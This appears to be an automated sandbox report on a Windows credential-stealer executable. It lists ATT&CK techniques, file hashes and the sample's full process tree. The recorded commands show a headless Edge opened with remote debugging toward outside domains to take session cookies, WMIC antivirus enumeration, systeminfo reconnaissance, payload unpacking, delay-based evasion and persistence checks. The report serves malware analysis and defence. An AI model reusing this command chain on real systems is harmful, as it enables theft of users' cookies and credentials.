bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
01-08-2024 08:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe
Size

8.0MB
MD5

7a9e91cd05bb23625354d0f46066904c
SHA1

7389f1881aba1c2ba3544321bd068bbf91dfa00a
SHA256

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40
SHA512

cdcd8c13f582682279463afc1a6196b65e127a0cb344632f1c2222f8f64793ae8c19547758eda94ece0bc9526b6ed13e552c3f6c9dbc2c6f157e601cbbc95c65
SSDEEP

49152:BYyqyQ4SjTErF0JwHoLjhbi4zmkKm0W85GNLZLgKT/MNMNngOdTMnWAqkeKbr3kg:PgR2HoLtb

Score

8^/10

credential_access discovery stealer

Malware Config

Signatures

Uses browser remote debugging 2 TTPs 2 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

msedge.exemsedge.exe

pid process

2464 msedge.exe
4388 msedge.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a2-stl-0729-early-(1)-TESTED.exebbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation	a2-stl-0729-early-(1)-TESTED.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe

Executes dropped EXE 7 IoCs

Processes:

kedb.exea2-stl-0729-early-(1)-TESTED.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exekedb.exe

pid process

1420 kedb.exe
924 a2-stl-0729-early-(1)-TESTED.exe
1348 PsInfo.exe
784 PsInfo64.exe
2364 PsInfo64.exe
1916 PsInfo64.exe
4724 kedb.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1420	kedb.exe
924	a2-stl-0729-early-(1)-TESTED.exe
1348	PsInfo.exe
784	PsInfo64.exe
2364	PsInfo64.exe
1916	PsInfo64.exe
4724	kedb.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

kedb.exePsInfo.exekedb.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kedb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PsInfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kedb.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PsInfo64.exePsInfo.exePsInfo64.exePsInfo64.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe

Delays execution with timeout.exe 18 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
5068	timeout.exe
2364	timeout.exe
1572	timeout.exe
2936	timeout.exe
1420	timeout.exe
3488	timeout.exe
3488	timeout.exe
624	timeout.exe
5068	timeout.exe
3556	timeout.exe
1356	timeout.exe
3068	timeout.exe
3128	timeout.exe
1232	timeout.exe
752	timeout.exe
3632	timeout.exe
4956	timeout.exe
2072	timeout.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1988 systeminfo.exe

pid	process
1988	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

msedge.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exe

pid	process
2464	msedge.exe
2464	msedge.exe
1348	PsInfo.exe
1348	PsInfo.exe
1348	PsInfo.exe
784	PsInfo64.exe
784	PsInfo64.exe
784	PsInfo64.exe
2364	PsInfo64.exe
2364	PsInfo64.exe
2364	PsInfo64.exe
1916	PsInfo64.exe
1916	PsInfo64.exe
1916	PsInfo64.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

WMIC.exemsedge.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: 36	744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: 36	744	WMIC.exe
Token: 33	2464	msedge.exe
Token: SeIncBasePriorityPrivilege	2464	msedge.exe
Token: 33	2464	msedge.exe
Token: SeIncBasePriorityPrivilege	2464	msedge.exe
Token: 33	2464	msedge.exe
Token: SeIncBasePriorityPrivilege	2464	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exemsedge.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3092 wrote to memory of 4908	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3092 wrote to memory of 4908	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4908 wrote to memory of 1420	4908	cmd.exe	timeout.exe
PID 4908 wrote to memory of 1420	4908	cmd.exe	timeout.exe
PID 3092 wrote to memory of 344	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3092 wrote to memory of 344	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 344 wrote to memory of 5068	344	cmd.exe	timeout.exe
PID 344 wrote to memory of 5068	344	cmd.exe	timeout.exe
PID 3092 wrote to memory of 1080	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3092 wrote to memory of 1080	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 1080 wrote to memory of 3128	1080	cmd.exe	timeout.exe
PID 1080 wrote to memory of 3128	1080	cmd.exe	timeout.exe
PID 3092 wrote to memory of 5108	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3092 wrote to memory of 5108	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 5108 wrote to memory of 1356	5108	cmd.exe	timeout.exe
PID 5108 wrote to memory of 1356	5108	cmd.exe	timeout.exe
PID 3092 wrote to memory of 2884	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3092 wrote to memory of 2884	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2884 wrote to memory of 3488	2884	cmd.exe	timeout.exe
PID 2884 wrote to memory of 3488	2884	cmd.exe	timeout.exe
PID 3092 wrote to memory of 4360	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3092 wrote to memory of 4360	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4360 wrote to memory of 2364	4360	cmd.exe	timeout.exe
PID 4360 wrote to memory of 2364	4360	cmd.exe	timeout.exe
PID 3092 wrote to memory of 2452	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3092 wrote to memory of 2452	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2452 wrote to memory of 2072	2452	cmd.exe	timeout.exe
PID 2452 wrote to memory of 2072	2452	cmd.exe	timeout.exe
PID 3092 wrote to memory of 2544	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3092 wrote to memory of 2544	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2544 wrote to memory of 1232	2544	cmd.exe	timeout.exe
PID 2544 wrote to memory of 1232	2544	cmd.exe	timeout.exe
PID 3092 wrote to memory of 2464	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	msedge.exe
PID 3092 wrote to memory of 2464	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	msedge.exe
PID 3092 wrote to memory of 2464	3092	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	msedge.exe
PID 2464 wrote to memory of 3520	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 3520	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 3984	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 3984	2464	msedge.exe	cmd.exe
PID 3984 wrote to memory of 744	3984	cmd.exe	WMIC.exe
PID 3984 wrote to memory of 744	3984	cmd.exe	WMIC.exe
PID 2464 wrote to memory of 2556	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 2556	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 4136	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 4136	2464	msedge.exe	cmd.exe
PID 4136 wrote to memory of 1420	4136	cmd.exe	kedb.exe
PID 4136 wrote to memory of 1420	4136	cmd.exe	kedb.exe
PID 4136 wrote to memory of 1420	4136	cmd.exe	kedb.exe
PID 2464 wrote to memory of 2228	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 2228	2464	msedge.exe	cmd.exe
PID 2228 wrote to memory of 1988	2228	cmd.exe	systeminfo.exe
PID 2228 wrote to memory of 1988	2228	cmd.exe	systeminfo.exe
PID 2228 wrote to memory of 652	2228	cmd.exe	findstr.exe
PID 2228 wrote to memory of 652	2228	cmd.exe	findstr.exe
PID 2464 wrote to memory of 628	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 628	2464	msedge.exe	cmd.exe
PID 628 wrote to memory of 752	628	cmd.exe	timeout.exe
PID 628 wrote to memory of 752	628	cmd.exe	timeout.exe
PID 2464 wrote to memory of 924	2464	msedge.exe	a2-stl-0729-early-(1)-TESTED.exe
PID 2464 wrote to memory of 924	2464	msedge.exe	a2-stl-0729-early-(1)-TESTED.exe
PID 2464 wrote to memory of 4052	2464	msedge.exe	cmd.exe
PID 2464 wrote to memory of 4052	2464	msedge.exe	cmd.exe
PID 4052 wrote to memory of 1348	4052	cmd.exe	PsInfo.exe
PID 4052 wrote to memory of 1348	4052	cmd.exe	PsInfo.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe
"C:\Users\Admin\AppData\Local\Temp\bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:1420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:5068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:3128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:5108

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2452

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:1232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://trujillolauriannelamar.com
2⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
3⤵
PID:3520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\417 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\417 > C:\Users\Admin\AppData\Local\temp\404
3⤵
PID:2556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o bxlg.zip
3⤵
- Suspicious use of WriteProcessMemory
PID:4136

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe
kedb.exe -o bxlg.zip
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\chg 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:1988

C:\Windows\system32\findstr.exe
findstr /C:"OS Name"
4⤵
PID:652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 60
3⤵
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\system32\timeout.exe
TIMEOUT /T 60
4⤵
- Delays execution with timeout.exe
PID:752

C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe
"C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1656

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2084

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:3732

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:4048

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:3408

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2044

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:5068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:3096

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:4868

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://annetteedgardomalcolm.com
4⤵
- Uses browser remote debugging
PID:4388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
5⤵
PID:828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o jucq_x64.zip
5⤵
PID:1728

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe
kedb.exe -o jucq_x64.zip
6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\yimck"& "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\yimck"
3⤵
- Suspicious use of WriteProcessMemory
PID:4052

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1348

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\yimck" & "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\yimck"
3⤵
PID:1588

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2364

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:4772

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:4520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:4856

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:4972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:4776

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:3120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:1308

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:2744

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:2188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:3548

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:4840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 60
3⤵
PID:4864

C:\Windows\system32\timeout.exe
TIMEOUT /T 60
4⤵
- Delays execution with timeout.exe
PID:4956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Defense Evasion

Modify Authentication Process

T1556

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\a2-stl-0729-early-(1)-TESTED.exe

Filesize
8.1MB

MD5
b1a8ccc5579c04685a13a9c68fce643d

SHA1
70af85f487837bd16ec844e8a77837201cdf19e9

SHA256
8039bce71905e88df6ee433cdcd2e8a3f66b1e1f5561b7a4ccb67cfca1383f34

SHA512
3fdac6c71e2967c033b09fae7150e35b3e20fcacc17ee6fcfaa83d42dad9af56d1ae2c16aa1f580c1dec5ab3445d5dfab24ffe01961136c8874316d2450542ae

Download Submit
C:\Users\Admin\AppData\Local\temp\417

Filesize
32B

MD5
b65e9213dae00101a52d72b56120ff81

SHA1
d52caec94e56a19cca2bcc6e38dc780b1cb90027

SHA256
dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740

SHA512
09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

Download Submit
C:\Users\Admin\AppData\Local\temp\clfb

Filesize
16B

MD5
b1ee3fc6ec4681dda580f6e911d9436f

SHA1
87a72d824a3788f19febbb863049afce981222be

SHA256
bd855b46dfb470ce12bbffa2f4d50534ca722a4ca834bd24bc7ceb471e4d6f0e

SHA512
ed5be398a0f8094d86196eb886b2ba9cea2edb998dd3fc47cf0d8f6d32c5ea37f8ab8161262a6717785335368cc16cd728505a1f58c082c3c143547a4051988a

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\1E3D6E

Filesize
202B

MD5
cef58084cd7ff2011aa362bd4d04411b

SHA1
d2184d84808347635cf5785cdf101a480d5452f4

SHA256
28de49d8053ab03a221ce5cfe045a9b129a38da08652e4cc3aea9c81d87f6ca9

SHA512
4102e55767cd4b2326ceba49b84dcf7040edcdbaa91f5bea2f1a4f8e29990483bdf60d5edbce1846d5d591c5fb6adda90f1ab779699abfaea27a9f6e4446e920

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe

Filesize
306KB

MD5
624adb0f45cbb9cadad83c264df98891

SHA1
e839ce1e0446d8da889935f411f0fb7ad54d4b3e

SHA256
8f401dc021e20ff3abc64a2d346ef6a792a5643ca04ffd1f297e417532acaa06

SHA512
b29b3a72cd32ee34ec6ce357818658b8a89c399e2f8439a7f49fb1a506ed912f41afa19bc5c142c9a4539acc5966a29c6a6637c23de0dc3e5f2d85264620bdba

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe

Filesize
343KB

MD5
